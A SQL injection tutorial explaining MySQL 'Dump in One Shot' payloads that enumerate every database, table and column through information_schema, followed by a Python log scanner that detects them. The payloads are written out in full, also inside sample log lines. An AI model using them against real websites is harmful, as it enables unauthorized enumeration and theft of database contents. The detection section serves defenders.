DIOS (Dump in One Shot) Explained

Starting on the name of My god "Allah" the most beneficent the most merciful

I don't know if there is already an explanation of DIOS, or whether it has been explained better than I am about to explain it, but I know many injectors are searching for one, and I am getting many requests to write an explanation of DIOS. So let's start understanding DIOS and how it actually works. We will first keep it easy and small, then move step by step to more complex queries. To understand DIOS you have to read the tutorial at least twice with full concentration. If you think you can skim through it step by step and understand it easily, then you are wrong and in the wrong place. So if you really want to understand, read it carefully.

Here is a basic query which gives us all the databases:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The query above gives us all the databases in one shot. To understand how it actually works, we first have to understand the red-colored part of the query. But before that, we have to understand the use of the IN clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The above statement extracts all the records from the table where the name value is either 'inj3ct0r', 'Zenodermus', 'Security' or 'Idiots'. It can also be written with OR, as given below.

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

The output of both statements will be the same. Now let's move back to DIOS, where we can see the innermost statement, which is:

(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

What is happening here is that we select a variable @a from information_schema.schemata and concatenate all the schema names inside the IN clause. So all the schema names end up in the IN clause and get selected, as they all exist in the table information_schema.schemata. As we can see above in the red part, @a is concatenated with itself within a loop (the WHERE condition is evaluated once for each row of the table): each time, "@a,schema_name,'<br>'" is added to @a. Now let's look at the rest.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

Now I guess you can understand that in the first statement we are selecting that concatenated variable @a. Now let's move to our next query, which gives us all the table names in one shot. One more thing: the reason we use this query is that group_concat does not allow more than 1024 characters, so with it we cannot extract much data. There are some other bypasses for the 1024-character limitation, which are discussed over here at Death Row Injection.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query gives us all the table names in the same manner we got the database names, but this time we need to add a condition to remove all the tables which belong to information_schema. Below is the query for that.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the query gives us all the table names, excluding the tables from information_schema. But there is still a problem: we cannot see which table belongs to which database, so we can also include table_schema in each concatenation.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we have all the database names and the table names, but there is a better option: we can get all the database names, table names and column names together by using the information_schema.columns table.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now let's take a common challenge that gets posted: extract all the table names which start with 'shit_'. In that case we can add another condition, as the query below shows.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in the next part of the DIOS explanation.
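
For defenders, every query above leaves the same fingerprint in a request: a user variable assigned the concat of itself (@a:=concat(@a, ...)) next to an information_schema table. The Python below is an added example, not part of the original post, that looks for that fingerprint in web access logs; the log lines, IP addresses and paths are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Traits shared by every query in this article.
SELF_CONCAT = re.compile(r"@(\w+)\s*:=\s*concat\s*\(\s*@\1\s*,")  # @a:=concat(@a,
VAR_ASSIGN = re.compile(r"@\w+\s*:=")                             # any @var:= assignment
METADATA = re.compile(r"information_schema\s*\.\s*(?:schemata|tables|columns)")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /item.php?id=(select+(@a)+from+(select(@a:=0x00),(select+(@a)+from+(information_schema.schemata)where+(@a)in+(@a:=concat(@a,schema_name,%27%3Cbr%3E%27))))a) HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2024:13:56:02 +0000] "GET /item.php?id=(SELECT%20(@x)%20FROM%20(SELECT(@x%3A%3D0x00),(SELECT%20(@x)%20FROM%20(information_schema.tables)WHERE%20(@x)IN%20(@x%3A%3DCONCAT(@x,table_name,%27%3Cbr%3E%27))))a) HTTP/1.1" 200 9731',
    '198.51.100.20 - - [10/Oct/2024:13:57:10 +0000] "GET /item.php?id=42&sort=name HTTP/1.1" 200 812',
    '198.51.100.21 - - [10/Oct/2024:13:58:44 +0000] "GET /search.php?q=information_schema.tables+tutorial HTTP/1.1" 200 1544',
]


def normalize(raw):
    """Undo URL encoding (two passes cover double encoding), fold case and whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw))).lower()


def classify(request_target):
    """Return 'dios', 'suspicious' or 'clean' for one request target."""
    text = normalize(request_target)
    has_metadata = bool(METADATA.search(text))
    if SELF_CONCAT.search(text) and has_metadata:
        return "dios"          # self-appending variable fed from a metadata table
    if VAR_ASSIGN.search(text) or has_metadata:
        return "suspicious"    # one trait alone: worth a look, not proof
    return "clean"


def scan(log_lines):
    """Return (client_ip, verdict) for every parsable line that is not clean."""
    hits = []
    for line in log_lines:
        match = REQUEST.match(line)
        if match and (verdict := classify(match.group(2))) != "clean":
            hits.append((match.group(1), verdict))
    return hits


if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

Access logs only record the request target, so values sent in POST bodies need the same check at a WAF or in database query logging.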